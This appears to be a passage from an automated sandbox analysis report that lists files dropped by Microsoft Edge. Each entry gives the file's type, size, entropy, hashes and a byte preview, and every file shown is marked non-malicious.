                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.J.0.I.i.I.V.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.3.t.4.y.3.9.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.004790205488785
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:YYve0DNrf+Uo3iUBWihetb+7eVUNjiqMYHA:YoJxr2ziQNetbsIamqMiA
                                                                                                                                                                                                                                                                                                                  MD5:BD39827E0F806327ED51C173CC1B4C2F
                                                                                                                                                                                                                                                                                                                  SHA1:B3031E98DB627595BF56DC67B05EC8ECE0CDFEFF
                                                                                                                                                                                                                                                                                                                  SHA-256:1CDB54FC7FFAE6D95B04B43B4AE74606DD15362F1DD8D2CBD55537FB87B505FE
                                                                                                                                                                                                                                                                                                                  SHA-512:A5D74678EBECD60BA5955E8D77FD76C4F102265AEA5902D07E1FF220EA73F358F0F71CBEBF4D164A79E6EB356994C16E4A524E51DEA79237A5A68DA4C872F97B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".O.F./.t.b.X.1.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.3.t.4.y.3.9.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.902563200290027
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xMJxl9Il8uhldGNX0yCevKwLisIIxKVrJvXrCNEd/vc:a6YvGNX0dwLiIKBJvXrA
                                                                                                                                                                                                                                                                                                                  MD5:99E05AB8E097A88E8174D9BF3AA0D201
                                                                                                                                                                                                                                                                                                                  SHA1:A405DE5A0AE212CA689E2F35B71844F32E7B839F
                                                                                                                                                                                                                                                                                                                  SHA-256:ABCCD3E77D0B040F35F60C0F3B0DD963EF6919815D6FD4A1158444A52B933063
                                                                                                                                                                                                                                                                                                                  SHA-512:FCA76C1CF0BD679802CF340F4567ED239316DFAFEF26C30DCE99F448C6CC5F66425BA8CD0512460E8A1AEA61E919F83EF508BBB2586DA2D4FED70D0C87A14C14
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".D.Z.L.R.n.k.6.B.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.3.t.4.y.3.9.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                                  MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                                  SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                                  SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                                  SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1604688
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.992815824232007
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:/INqd2ABGJAAlC7hIdpzW3CKZlJxOvHAbZ:wN02+G2NtIdpzKC4JgvA1
                                                                                                                                                                                                                                                                                                                  MD5:93163F862F400775A307B2C3E19D98D4
                                                                                                                                                                                                                                                                                                                  SHA1:26CC4BE2DFC2024D6238B89C0D01075FD7D7152D
                                                                                                                                                                                                                                                                                                                  SHA-256:3EDC82D6CA01EBB3570147070AC9CE692F89CFE8A35050038F5D34785A5E38D9
                                                                                                                                                                                                                                                                                                                  SHA-512:CC12C5FDEF3AB337787C169D3E2A917DBE7BFA4F533430132AF189EE63EF55B23180888FCC3F630A6B19B65216023280883FD78CFC225A814916A1B2C74BCDFA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...2......?......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H.............................2...........2...........pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^......IDATh..Z.t\.y.f.fF.b$.....2.%.0`...qR..&.J..4...a+1.p....z ...J....p @h....W..E.b-3...w.<i$.b..........+.S.Ip*....\n...7..#........m.......s....3~..D.nn.,.y.Q..@eA5f.7`F.L.e.#3#.nX.*.D.n...n.U.e.g.\H...>IW.s.s..!.D.r[.K.....-k.r..x...@.(..<O6<n.D..r.TmD.$c.'z..A....../..?@]Y.....2...d....J...+.t=.l.}.!.RH.I..H`..xo..X..)...e.. c..n#..d...p..Bz.*....(.$....4E:.L.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41902
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):76320
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.996049401943884
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wlamX5p5X7:GdS8scZNzFrMa4M+lK5/n2w5XX7
                                                                                                                                                                                                                                                                                                                  MD5:9E7360DB969B54C06180421A84016A98
                                                                                                                                                                                                                                                                                                                  SHA1:2D99D9C16A9FE8D063BBEC75ED7FF67890A92C88
                                                                                                                                                                                                                                                                                                                  SHA-256:C5299D040AD096B714B72413D4A9D5EFA7E8745424957CF18E4291882C4C8CA1
                                                                                                                                                                                                                                                                                                                  SHA-512:7BFFD0F154F2F86594B9EDDF5041E04D48258BE8B764A658D27B1716CF36C75ED7FAA22A0E77703126BE9C053C88EBA444B1E6228257430E2494513711FFEF1D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):353
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.26963627234606
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:YE43ipLlCVJyu56s/u43ipL5QEKyk9kuQJjDrwv/u43ipLIf2P56s/C:YExYz56s/OxiPyip0Dkv/OxKa56s/C
                                                                                                                                                                                                                                                                                                                  MD5:3C47DD786C272D9626B4CE20E08008FC
                                                                                                                                                                                                                                                                                                                  SHA1:3677069D69F0F54E31D29935A144B56021CC285E
                                                                                                                                                                                                                                                                                                                  SHA-256:A21FF7F7FFEC0ED950CBC6729CC96A4D7D6CBA45A293187CFE9439AC65D47DFF
                                                                                                                                                                                                                                                                                                                  SHA-512:6159A4DB7FF67A36946BFEB4C7DDF94306338505801EF81E9C367AB3DDC6A1B2BE8936D52CB5A7E3DA35230F595865BCC6C1F365E9C28A22DF1019BC73C87CD8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"logTime": "0109/095920", "correlationVector":"EHvkO0w/g7tXglEiT/hA6Z","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0109/095920", "correlationVector":"911AE9DFBF9A4A6F915AA4CCF3243F84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0109/095920", "correlationVector":"FvNnNUbejmovZouHetuJeB","action":"EXTENSION_UPDATER", "result":""}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
